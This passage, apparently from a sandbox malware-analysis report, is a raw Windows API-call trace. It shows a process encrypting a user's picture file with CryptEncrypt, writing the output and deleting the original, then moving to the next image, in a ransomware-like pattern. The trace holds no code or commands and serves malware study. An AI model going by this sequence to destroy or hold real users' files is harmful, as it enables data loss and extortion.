hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0086.844] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.844] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0086.844] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0086.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0086.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0086.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0086.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0086.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0086.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0086.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0086.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0086.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0086.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0086.845] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0086.845] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.845] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0086.845] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.845] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca610, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0086.845] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x8c24, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x8c30) returned 1 [0086.846] CharLowerBuffW (in: lpsz="byte[35889]", cchLength=0xb | out: lpsz="byte[35889]") returned 0xb [0086.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.846] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0086.846] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x45304a0*, pdwDataLen=0x144e790*=0x8c24, dwBufLen=0x8c30 | out: pbData=0x45304a0*, pdwDataLen=0x144e790*=0x8c30) returned 1 [0086.847] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0086.847] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0086.847] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.847] WriteFile (in: hFile=0x258, lpBuffer=0x451ec48*, nNumberOfBytesToWrite=0x8c30, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x451ec48*, lpNumberOfBytesWritten=0x144f194*=0x8c30, lpOverlapped=0x0) returned 1 [0086.848] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0086.849] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.849] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0086.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0086.849] CryptDestroyKey (hKey=0x41ac280) returned 1 [0086.849] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0086.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0086.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.849] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0086.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0086.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.850] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.850] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0086.850] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0086.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0086.850] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0086.850] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.850] FreeLibrary (hLibModule=0x756e0000) returned 1 [0086.927] CloseHandle (hObject=0x298) returned 1 [0086.928] CloseHandle (hObject=0x258) returned 1 [0086.930] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\5MOGH3JqsJ.bmp", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\5MOGH3JqsJ.bmp", lpFilePart=0x0) returned 0x27 [0086.930] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5MOGH3JqsJ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\5mogh3jqsj.bmp")) returned 0x20 [0086.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0086.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0086.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0086.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0086.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0086.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0086.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0086.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0086.930] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\5MOGH3JqsJ.bmp", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb9d9970, ftCreationTime.dwHighDateTime=0x1d5e4b9, ftLastAccessTime.dwLowDateTime=0xb5223e70, ftLastAccessTime.dwHighDateTime=0x1d5e2a1, ftLastWriteTime.dwLowDateTime=0xb5223e70, ftLastWriteTime.dwHighDateTime=0x1d5e2a1, nFileSizeHigh=0x0, nFileSizeLow=0x8c24, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="5MOGH3JqsJ.bmp", cAlternateFileName="5MOGH3~1.BMP")) returned 0x41ac600 [0086.931] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5MOGH3JqsJ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\5mogh3jqsj.bmp")) returned 1 [0087.015] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb9d9970, ftCreationTime.dwHighDateTime=0x1d5e4b9, ftLastAccessTime.dwLowDateTime=0xb5223e70, ftLastAccessTime.dwHighDateTime=0x1d5e2a1, ftLastWriteTime.dwLowDateTime=0xb5223e70, ftLastWriteTime.dwHighDateTime=0x1d5e2a1, nFileSizeHigh=0x0, nFileSizeLow=0x8c24, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="5MOGH3JqsJ.bmp", cAlternateFileName="5MOGH3~1.BMP")) returned 0 [0087.015] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0087.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0087.016] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 1 [0087.016] TranslateMessage (lpMsg=0x144f534) returned 0 [0087.016] DispatchMessageW (lpMsg=0x144f534) returned 0x0 [0087.016] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0087.016] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0087.016] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0087.016] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0087.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7e48 | out: hHeap=0x1780000) returned 1 [0087.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0087.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0087.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0087.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0087.017] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0087.017] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0087.017] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0087.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0087.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0087.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0087.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0087.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da7a0 [0087.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0087.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0087.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0087.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9908 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0087.018] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0087.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0087.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0087.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0087.018] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0087.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0087.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0087.018] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\9TpncYB524P.bmp", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd22c4e00, ftCreationTime.dwHighDateTime=0x1d5ed16, ftLastAccessTime.dwLowDateTime=0x3438bd60, ftLastAccessTime.dwHighDateTime=0x1d5e4cd, ftLastWriteTime.dwLowDateTime=0x3438bd60, ftLastWriteTime.dwHighDateTime=0x1d5e4cd, nFileSizeHigh=0x0, nFileSizeLow=0xca29, dwReserved0=0x0, dwReserved1=0x8, cFileName="9TpncYB524P.bmp", cAlternateFileName="9TPNCY~1.BMP")) returned 0x41ac000 [0087.018] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0087.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0087.019] HeapFree (in: hHeap=0x1780000, 